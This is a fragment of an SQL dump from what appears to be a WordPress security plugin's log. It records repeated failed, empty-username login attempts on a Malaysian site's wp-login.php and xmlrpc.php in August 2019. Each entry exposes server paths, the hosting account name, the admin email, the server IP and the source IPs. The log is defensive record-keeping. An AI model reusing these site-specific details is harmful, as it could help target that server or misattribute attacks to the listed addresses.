Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.155.58\";s:11:\"REMOTE_PORT\";s:5:\"53394\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT0jotV65@1l3w0lHN2AQAAAEk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566897294.1079\";s:12:\"REQUEST_TIME\";s:10:\"1566897294\";}}','notice','2019-08-27 09:14:55','2019-08-27 09:14:54',18201848,19500616,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.155.58'),(23412,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"123.31.31.12\";s:11:\"REMOTE_PORT\";s:5:\"58922\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT2r7dCvC5@KvzqwiFSaAAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566897840.1301\";s:12:\"REQUEST_TIME\";s:10:\"1566897840\";}}','notice','2019-08-27 09:24:02','2019-08-27 09:24:00',17681960,19170688,'https://bintara.com.my/wp-login.php',1,0,'123.31.31.12'),(23413,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.134.46\";s:11:\"REMOTE_PORT\";s:5:\"38228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT6ordCvC5@KvzqwiFTvAAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566898851.9589\";s:12:\"REQUEST_TIME\";s:10:\"1566898851\";}}','notice','2019-08-27 09:40:53','2019-08-27 09:40:52',17682104,19172936,'https://bintara.com.my/wp-login.php',1,0,'148.66.134.46'),(23414,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.255.190.137\";s:11:\"REMOTE_PORT\";s:5:\"51106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT884ir4pgxiIHnHK5B6AAAAck\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566899443.9233\";s:12:\"REQUEST_TIME\";s:10:\"1566899443\";}}','notice','2019-08-27 09:50:45','2019-08-27 09:50:44',17685264,19176536,'https://bintara.com.my/wp-login.php',1,0,'103.255.190.137'),(23415,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.113.132.65\";s:11:\"REMOTE_PORT\";s:5:\"50379\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT@5ItV65@1l3w0lHN9OgAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566899940.2413\";s:12:\"REQUEST_TIME\";s:10:\"1566899940\";}}','notice','2019-08-27 09:59:01','2019-08-27 09:59:00',17683896,19172968,'https://bintara.com.my/wp-login.php',1,0,'212.113.132.65'),(23416,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"138.197.172.198\";s:11:\"REMOTE_PORT\";s:5:\"39734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUBD4tV65@1l3w0lHN@NQAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566900495.8779\";s:12:\"REQUEST_TIME\";s:10:\"1566900495\";}}','notice','2019-08-27 10:08:17','2019-08-27 10:08:16',17684824,19177440,'https://bintara.com.my/wp-login.php',1,0,'138.197.172.198'),(23417,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.175.190\";s:11:\"REMOTE_PORT\";s:5:\"58360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUDjYtV65@1l3w0lHN-EwAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566901133.2163\";s:12:\"REQUEST_TIME\";s:10:\"1566901133\";}}','notice','2019-08-27 10:18:54','2019-08-27 10:18:53',17690312,19176944,'https://bintara.com.my/wp-login.php',1,0,'188.166.175.190'),(23418,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.175.190\";s:11:\"REMOTE_PORT\";s:5:\"58360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUDjYtV65@1l3w0lHN-EwAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566901133.2163\";s:12:\"REQUEST_TIME\";s:10:\"1566901133\";}}','notice','2019-08-27 10:18:55','2019-08-27 10:18:53',17852640,19176944,'https://bintara.com.my/wp-login.php',1,0,'188.166.175.190'),(23419,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.93.149\";s:11:\"REMOTE_PORT\";s:5:\"47334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUFaYtV65@1l3w0lHOAXQAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566901610.0497\";s:12:\"REQUEST_TIME\";s:10:\"1566901610\";}}','notice','2019-08-27 10:26:51','2019-08-27 10:26:50',17681576,19172200,'https://bintara.com.my/wp-login.php',1,0,'206.189.93.149'),(23420,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 